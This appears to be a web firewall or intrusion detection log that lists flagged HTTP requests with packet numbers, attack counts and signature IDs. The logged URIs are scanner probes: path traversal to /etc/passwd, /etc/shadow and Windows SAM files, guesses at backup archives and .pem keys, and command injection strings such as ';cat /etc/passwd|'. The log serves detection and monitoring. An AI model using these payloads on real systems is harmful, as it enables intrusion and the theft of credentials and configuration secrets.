Packet [664]	Uri [/web/web/download_file.php?file=../../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [665]	Uri [/web/magmi/web/download_file.php?file=../../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [666]	Uri [/web/magmi-importer/web/download_file.php?file=../../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [667]	Uri [/web/magento/magmi/web/download_file.php?file=../../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [668]	Uri [/web/magento/magmi-importer/web/download_file.php?file=../../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [669]	Uri [/web/shop/magmi/web/download_file.php?file=../../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [670]	Uri [/web/shop/magmi-importer/web/download_file.php?file=../../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [671]	Uri [/web/web/download_file.php?file=../../app/etc/local.xml]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [672]	Uri [/web/magmi/web/download_file.php?file=../../app/etc/local.xml]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [673]	Uri [/web/magmi-importer/web/download_file.php?file=../../app/etc/local.xml]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [674]	Uri [/web/magento/magmi/web/download_file.php?file=../../app/etc/local.xml]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [675]	Uri [/web/magento/magmi-importer/web/download_file.php?file=../../app/etc/local.xml]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [676]	Uri [/web/shop/magmi/web/download_file.php?file=../../app/etc/local.xml]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [677]	Uri [/web/shop/magmi-importer/web/download_file.php?file=../../app/etc/local.xml]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [678]	Uri [/web/scgi-bin/platform.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [686]	Uri [/web/Go4RIFKD.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [689]	Uri [/web/Go4RIFKD.ini]	Nattacks [1]	Signatures	[300001517]
Packet [690]	Uri [/web/Go4RIFKD.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [692]	Uri [/web/Go4RIFKD.cfg]	Nattacks [1]	Signatures	[300001506]
Packet [693]	Uri [/web/Go4RIFKD.exe]	Nattacks [1]	Signatures	[300001562]
Packet [698]	Uri [/web/Go4RIFKD.dll]	Nattacks [1]	Signatures	[300001562]
Packet [701]	Uri [/web/Go4RIFKD.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [743]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini%00]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]
Packet [744]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [745]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts%00]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]
Packet [746]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/HASH(0x55ea1212ed30)%00]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]
Packet [747]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini%00]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]
Packet [748]	Uri [/web/typo3/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini%00]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]
Packet [772]	Uri [/web/1921681.war]	Nattacks [1]	Signatures	[300001516]
Packet [773]	Uri [/web/1921681.war]	Nattacks [1]	Signatures	[300001516]
Packet [782]	Uri [/web/101.pem]	Nattacks [1]	Signatures	[300001925]
Packet [783]	Uri [/web/101.pem]	Nattacks [1]	Signatures	[300001925]
Packet [794]	Uri [/web/1921681101.sql]	Nattacks [1]	Signatures	[300001526]
Packet [795]	Uri [/web/1921681101.sql]	Nattacks [1]	Signatures	[300001526]
Packet [798]	Uri [/web/1.pem]	Nattacks [1]	Signatures	[300001925]
Packet [799]	Uri [/web/1.pem]	Nattacks [1]	Signatures	[300001925]
Packet [802]	Uri [/web/168.pem]	Nattacks [1]	Signatures	[300001925]
Packet [803]	Uri [/web/168.pem]	Nattacks [1]	Signatures	[300001925]
Packet [808]	Uri [/web/backup.tar.gz]	Nattacks [2]	Signatures	[300001519]	[300002752]
Packet [809]	Uri [/web/backup.tar.gz]	Nattacks [2]	Signatures	[300001519]	[300002752]
Packet [820]	Uri [/web/192_168_1_101.pem]	Nattacks [1]	Signatures	[300001925]
Packet [821]	Uri [/web/192_168_1_101.pem]	Nattacks [1]	Signatures	[300001925]
Packet [822]	Uri [/web/192.168.pem]	Nattacks [1]	Signatures	[300001925]
Packet [823]	Uri [/web/192.168.pem]	Nattacks [1]	Signatures	[300001925]
Packet [832]	Uri [/web/192_168_1_101.sql]	Nattacks [1]	Signatures	[300001526]
Packet [833]	Uri [/web/192_168_1_101.sql]	Nattacks [1]	Signatures	[300001526]
Packet [842]	Uri [/web/1921681101.war]	Nattacks [1]	Signatures	[300001516]
Packet [843]	Uri [/web/1921681101.war]	Nattacks [1]	Signatures	[300001516]
Packet [850]	Uri [/web/192168.war]	Nattacks [1]	Signatures	[300001516]
Packet [851]	Uri [/web/192168.war]	Nattacks [1]	Signatures	[300001516]
Packet [852]	Uri [/web/1921681.pem]	Nattacks [1]	Signatures	[300001925]
Packet [853]	Uri [/web/1921681.pem]	Nattacks [1]	Signatures	[300001925]
Packet [862]	Uri [/web/192_168_1_101.war]	Nattacks [1]	Signatures	[300001516]
Packet [863]	Uri [/web/192_168_1_101.war]	Nattacks [1]	Signatures	[300001516]
Packet [892]	Uri [/web/site.war]	Nattacks [1]	Signatures	[300001516]
Packet [893]	Uri [/web/site.war]	Nattacks [1]	Signatures	[300001516]
Packet [898]	Uri [/web/192.pem]	Nattacks [1]	Signatures	[300001925]
Packet [899]	Uri [/web/192.pem]	Nattacks [1]	Signatures	[300001925]
Packet [906]	Uri [/web/192168.sql]	Nattacks [1]	Signatures	[300001526]
Packet [907]	Uri [/web/192168.sql]	Nattacks [1]	Signatures	[300001526]
Packet [908]	Uri [/web/192.168.war]	Nattacks [1]	Signatures	[300001516]
Packet [909]	Uri [/web/192.168.war]	Nattacks [1]	Signatures	[300001516]
Packet [922]	Uri [/web/site.pem]	Nattacks [1]	Signatures	[300001925]
Packet [923]	Uri [/web/site.pem]	Nattacks [1]	Signatures	[300001925]
Packet [926]	Uri [/web/backup.pem]	Nattacks [1]	Signatures	[300001925]
Packet [927]	Uri [/web/backup.pem]	Nattacks [1]	Signatures	[300001925]
Packet [932]	Uri [/web/192.168.1.pem]	Nattacks [1]	Signatures	[300001925]
Packet [933]	Uri [/web/192.168.1.pem]	Nattacks [1]	Signatures	[300001925]
Packet [948]	Uri [/web/backup.sql]	Nattacks [1]	Signatures	[300001526]
Packet [949]	Uri [/web/backup.sql]	Nattacks [1]	Signatures	[300001526]
Packet [958]	Uri [/web/192.168.sql]	Nattacks [1]	Signatures	[300001526]
Packet [959]	Uri [/web/192.168.sql]	Nattacks [1]	Signatures	[300001526]
Packet [960]	Uri [/web/192168.pem]	Nattacks [1]	Signatures	[300001925]
Packet [961]	Uri [/web/192168.pem]	Nattacks [1]	Signatures	[300001925]
Packet [974]	Uri [/web/192.168.1.sql]	Nattacks [1]	Signatures	[300001526]
Packet [975]	Uri [/web/192.168.1.sql]	Nattacks [1]	Signatures	[300001526]
Packet [982]	Uri [/web/168.sql]	Nattacks [1]	Signatures	[300001526]
Packet [983]	Uri [/web/168.sql]	Nattacks [1]	Signatures	[300001526]
Packet [986]	Uri [/web/192.war]	Nattacks [1]	Signatures	[300001516]
Packet [987]	Uri [/web/192.war]	Nattacks [1]	Signatures	[300001516]
Packet [994]	Uri [/web/1921681101.pem]	Nattacks [1]	Signatures	[300001925]
Packet [995]	Uri [/web/1921681101.pem]	Nattacks [1]	Signatures	[300001925]
Packet [1002]	Uri [/web/192.168.1.101.war]	Nattacks [1]	Signatures	[300001516]
Packet [1003]	Uri [/web/192.168.1.101.war]	Nattacks [1]	Signatures	[300001516]
Packet [1004]	Uri [/web/backup.war]	Nattacks [1]	Signatures	[300001516]
Packet [1005]	Uri [/web/backup.war]	Nattacks [1]	Signatures	[300001516]
Packet [1010]	Uri [/web/backup.zip]	Nattacks [1]	Signatures	[300002752]
Packet [1011]	Uri [/web/backup.zip]	Nattacks [1]	Signatures	[300002752]
Packet [1024]	Uri [/web/101.sql]	Nattacks [1]	Signatures	[300001526]
Packet [1025]	Uri [/web/101.sql]	Nattacks [1]	Signatures	[300001526]
Packet [1036]	Uri [/web/101.war]	Nattacks [1]	Signatures	[300001516]
Packet [1037]	Uri [/web/101.war]	Nattacks [1]	Signatures	[300001516]
Packet [1038]	Uri [/web/192.168.1.101.pem]	Nattacks [1]	Signatures	[300001925]
Packet [1039]	Uri [/web/192.168.1.101.pem]	Nattacks [1]	Signatures	[300001925]
Packet [1046]	Uri [/web/192.sql]	Nattacks [1]	Signatures	[300001526]
Packet [1047]	Uri [/web/192.sql]	Nattacks [1]	Signatures	[300001526]
Packet [1052]	Uri [/web/192.168.1.101.sql]	Nattacks [1]	Signatures	[300001526]
Packet [1053]	Uri [/web/192.168.1.101.sql]	Nattacks [1]	Signatures	[300001526]
Packet [1054]	Uri [/web/168.war]	Nattacks [1]	Signatures	[300001516]
Packet [1055]	Uri [/web/168.war]	Nattacks [1]	Signatures	[300001516]
Packet [1062]	Uri [/web/site.sql]	Nattacks [1]	Signatures	[300001526]
Packet [1063]	Uri [/web/site.sql]	Nattacks [1]	Signatures	[300001526]
Packet [1084]	Uri [/web/192.168.1.war]	Nattacks [1]	Signatures	[300001516]
Packet [1085]	Uri [/web/192.168.1.war]	Nattacks [1]	Signatures	[300001516]
Packet [1094]	Uri [/web/backup.tar]	Nattacks [2]	Signatures	[300001519]	[300002752]
Packet [1095]	Uri [/web/backup.tar]	Nattacks [2]	Signatures	[300001519]	[300002752]
Packet [1096]	Uri [/web/1.war]	Nattacks [1]	Signatures	[300001516]
Packet [1097]	Uri [/web/1.war]	Nattacks [1]	Signatures	[300001516]
Packet [1098]	Uri [/web/1.sql]	Nattacks [1]	Signatures	[300001526]
Packet [1099]	Uri [/web/1.sql]	Nattacks [1]	Signatures	[300001526]
Packet [1100]	Uri [/web/1921681.sql]	Nattacks [1]	Signatures	[300001526]
Packet [1101]	Uri [/web/1921681.sql]	Nattacks [1]	Signatures	[300001526]
Packet [1110]	Uri [/web/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1111]	Uri [/web/index.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1112]	Uri [/web/index.pl]	Nattacks [1]	Signatures	[300001513]
Packet [1120]	Uri [/web/index.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1131]	Uri [/web/admin.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1132]	Uri [/web/administrator.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1133]	Uri [/web/authLogin.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1135]	Uri [/web/banner.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1136]	Uri [/web/book.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1137]	Uri [/web/cgiinfo.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1138]	Uri [/web/cgitest.py]	Nattacks [1]	Signatures	[300001513]
Packet [1140]	Uri [/web/contact.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1141]	Uri [/web/count.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1142]	Uri [/web/defaultwebpage.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1143]	Uri [/web/download.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1144]	Uri [/web/entropysearch.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1145]	Uri [/web/env.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1146]	Uri [/web/environment.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1148]	Uri [/web/formmail.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1149]	Uri [/web/FormMail-clone.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1150]	Uri [/web/guestbook.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1151]	Uri [/web/helpdesk.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1152]	Uri [/web/index.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1154]	Uri [/web/index.pl]	Nattacks [1]	Signatures	[300001513]
Packet [1155]	Uri [/web/info.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1157]	Uri [/web/loadpage.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1158]	Uri [/web/login.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1160]	Uri [/web/login.pl]	Nattacks [1]	Signatures	[300001513]
Packet [1161]	Uri [/web/pathtest.pl]	Nattacks [1]	Signatures	[300001513]
Packet [1166]	Uri [/web/php.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1168]	Uri [/web/printenv]	Nattacks [1]	Signatures	[300001826]
Packet [1169]	Uri [/web/restore_config.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1170]	Uri [/web/ruby.rb]	Nattacks [1]	Signatures	[300001505]
Packet [1172]	Uri [/web/search.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1175]	Uri [/web/sysinfo.pl]	Nattacks [1]	Signatures	[300001513]
Packet [1178]	Uri [/web/test.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1181]	Uri [/web/test_cgi.pl]	Nattacks [1]	Signatures	[300001513]
Packet [1182]	Uri [/web/test-cgi.pl]	Nattacks [1]	Signatures	[300001513]
Packet [1183]	Uri [/web/test.py]	Nattacks [1]	Signatures	[300001513]
Packet [1185]	Uri [/web/tmUnblock.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1186]	Uri [/web/uname.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1187]	Uri [/web/viewcvs.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1189]	Uri [/web/whois.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1191]	Uri [/web/../../../../../../../../../../../../etc/shadow]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [1195]	Uri [/web/cfappman/index.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1196]	Uri [/web/cfdocs/examples/cvbeans/beaninfo.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1197]	Uri [/web/cfdocs/examples/parks/detail.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1206]	Uri [/web/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [1208]	Uri [/web/view_source.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [1209]	Uri [/web/admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [1210]	Uri [/web/3rdparty/phpMyAdmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../]	Nattacks [3]	Signatures	[300000067]	[300001145]	[300001820]
Packet [1211]	Uri [/web/phpMyAdmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../]	Nattacks [3]	Signatures	[300000067]	[300001145]	[300001820]
Packet [1212]	Uri [/web/3rdparty/phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../]	Nattacks [4]	Signatures	[300000067]	[300001145]	[300001820]	[300001843]
Packet [1213]	Uri [/web/phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../]	Nattacks [4]	Signatures	[300000067]	[300001145]	[300001820]	[300001843]
Packet [1214]	Uri [/web/pma/db_details_importdocsql.php?submit_show=true&do=import&docpath=../]	Nattacks [3]	Signatures	[300000067]	[300001145]	[300001820]
Packet [1215]	Uri [/web/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [1216]	Uri [/web/PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [1217]	Uri [/web/..\..\..\..\..\..\temp\temp.class]	Nattacks [2]	Signatures	[300000057]	[300000071]
Packet [1218]	Uri [/web/../../../../../../../../../../etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [1219]	Uri [/web/.../.../.../.../.../.../.../.../.../boot.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001517]
Packet [1220]	Uri [/web/................../etc/passwd]	Nattacks [2]	Signatures	[300000067]	[300001559]
Packet [1221]	Uri [/web/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001517]
Packet [1222]	Uri [/web/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [1223]	Uri [/web/ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini]	Nattacks [4]	Signatures	[300000057]	[300000066]	[300000067]	[300001517]
Packet [1224]	Uri [/web/ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd]	Nattacks [2]	Signatures	[300000057]	[300000066]
Packet [1225]	Uri [/web/ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini]	Nattacks [3]	Signatures	[300000057]	[300000066]	[300001517]
Packet [1226]	Uri [/web/cfdocs/snippets/viewexample.cfm]	Nattacks [1]	Signatures	[300001516]
Packet [1228]	Uri [/web/ext.ini.%00.txt]	Nattacks [1]	Signatures	[300001359]
Packet [1235]	Uri [/web/host-manager/contextAdmin/contextAdmin.html]	Nattacks [1]	Signatures	[300001901]
Packet [1239]	Uri [/web/file/../../../../../../../../etc/]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [1240]	Uri [/web/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [1241]	Uri [/web/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [1242]	Uri [/web/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [1243]	Uri [/web/axis-cgi/buffer/command.cgi]	Nattacks [1]	Signatures	[300001513]
Packet [1244]	Uri [/web/cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001513]	[300001559]
Packet [1245]	Uri [/web../../../../../../../../../../etc/*]	Nattacks [3]	Signatures	[300000039]	[300000057]	[300000067]
Packet [1246]	Uri [/web../../../../../../../../../../etc/passw*]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [1247]	Uri [/web/bytehoard/index.php?infolder=../../../../../../../../../../../etc/]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [1248]	Uri [/web/OpenFile.aspx?file=../../../../../../../../../../boot.ini]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001145]
Packet [1249]	Uri [/web/.../.../.../.../.../.../.../.../.../.../etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [1250]	Uri [/web/scripts/cphost.dll]	Nattacks [1]	Signatures	[300001562]
Packet [1251]	Uri [/web////../../data/config/microsrv.cfg]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001506]
Packet [1252]	Uri [/web////////../../../../../../etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [1253]	Uri [/web/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001517]
Packet [1254]	Uri [/web/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001517]
Packet [1257]	Uri [/web/mylog.html?screen=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [1258]	Uri [/web/mylog.phtml?screen=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [1261]	Uri [/web/php/mylog.html?screen=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [1262]	Uri [/web/php/mylog.phtml?screen=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [1263]	Uri [/web/fi?/etc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [1264]	Uri [/web/directory.php?dir=%3Bcat%20/etc/passwd]	Nattacks [2]	Signatures	[300000051]	[300001559]
Packet [1266]	Uri [/web/content/base/build/explorer/none.php?/etc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [1275]	Uri [/web/scripts/tools/getdrvrs.exe]	Nattacks [1]	Signatures	[300001562]
Packet [1276]	Uri [/web/shop/normal_html.cgi?file=../../../../../../etc/issue%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001513]
Packet [1277]	Uri [/web/shop/normal_html.cgi?file=;cat%20/etc/passwd|]	Nattacks [3]	Signatures	[300000051]	[300001513]	[300001559]
Packet [1278]	Uri [/web/shop/normal_html.cgi?file=|cat%20/etc/passwd|]	Nattacks [2]	Signatures	[300001513]	[300001559]
Packet [1279]	Uri [/web/shop/member_html.cgi?file=;cat%20/etc/passwd|]	Nattacks [3]	Signatures	[300000051]	[300001513]	[300001559]
Packet [1280]	Uri [/web/shop/member_html.cgi?file=|cat%20/etc/passwd|]	Nattacks [2]	Signatures	[300001513]	[300001559]
Packet [1281]	Uri [/web/boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [1282]	Uri [/web/?pattern=/etc/*&sort=name]	Nattacks [2]	Signatures	[300000039]	[300002734]
Packet [1283]	Uri [/web/images/?pattern=/etc/*&sort=name]	Nattacks [2]	Signatures	[300000039]	[300002734]
Packet [1284]	Uri [/web/3rdparty/phpMyAdmin/export.php?what=../../../../../../../../../../../../etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [1285]	Uri [/web/phpMyAdmin/export.php?what=../../../../../../../../../../../../etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [1286]	Uri [/web/3rdparty/phpmyadmin/export.php?what=../../../../../../../../../../../../etc/passwd%00]	Nattacks [6]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]	[300001843]
Packet [1287]	Uri [/web/phpmyadmin/export.php?what=../../../../../../../../../../../../etc/passwd%00]	Nattacks [6]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]	[300001843]
Packet [1288]	Uri [/web/pma/export.php?what=../../../../../../../../../../../../etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [1289]	Uri [/web/dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00]	Nattacks [6]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001513]	[300001559]
Packet [1290]	Uri [/web/internal.sws?../../../../../../../../winnt/win.ini]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [1291]	Uri [/web/internal.sws?../../../../../../../../winnt/win.ini]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [1292]	Uri [/web/internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [1293]	Uri [/web/internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [1294]	Uri [/web/viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [1295]	Uri [/web/.../.../.../]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [1304]	Uri [/web/shoutbox.php?conf=../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [1305]	Uri [/web/.%252e/.%252e/.%252e/winnt/boot.ini]	Nattacks [1]	Signatures	[300001517]
Packet [1313]	Uri [/web/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist+httplist/../../../../../system/autoexec.ncf]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [1314]	Uri [/web/opendir.php?/etc/passwd]	Nattacks [1]	Signatures	[300001559]
Packet [1315]	Uri [/web/opendir.php?requesturl=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [1316]	Uri [/web/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001562]
Packet [1317]	Uri [/web/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001562]
Packet [1318]	Uri [/web/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001517]
Packet [1319]	Uri [/web/..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001517]
Packet [1320]	Uri [/web/gallery/index.php?include=../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [1321]	Uri [/web/modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [1322]	Uri [/web/phprocketaddin/?page=../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [1323]	Uri [/web/msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [1324]	Uri [/web/pls/sample/admin_/help/..%255cplsql.conf]	Nattacks [1]	Signatures	[300001517]
Packet [1325]	Uri [/web/..%252f..%252f..%252f..%252f..%252f../windows/repair/sam]	Nattacks [1]	Signatures	[300000067]
Packet [1326]	Uri [/web/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam]	Nattacks [1]	Signatures	[300000067]
Packet [1327]	Uri [/web/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._]	Nattacks [1]	Signatures	[300000067]
Packet [1328]	Uri [/web/..%255c..%255c..%255c..%255c..%255c../windows/repair/sam]	Nattacks [1]	Signatures	[300000067]
Packet [1329]	Uri [/web/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam]	Nattacks [1]	Signatures	[300000067]
Packet [1330]	Uri [/web/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._]	Nattacks [1]	Signatures	[300000067]
Packet [1331]	Uri [/web/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [1332]	Uri [/web/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [1333]	Uri [/web/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._]	Nattacks [2]	Signatures	[300000057]	[300000067]
Packet [1334]	Uri [/web/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001517]
Packet [1335]	Uri [/web/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001517]
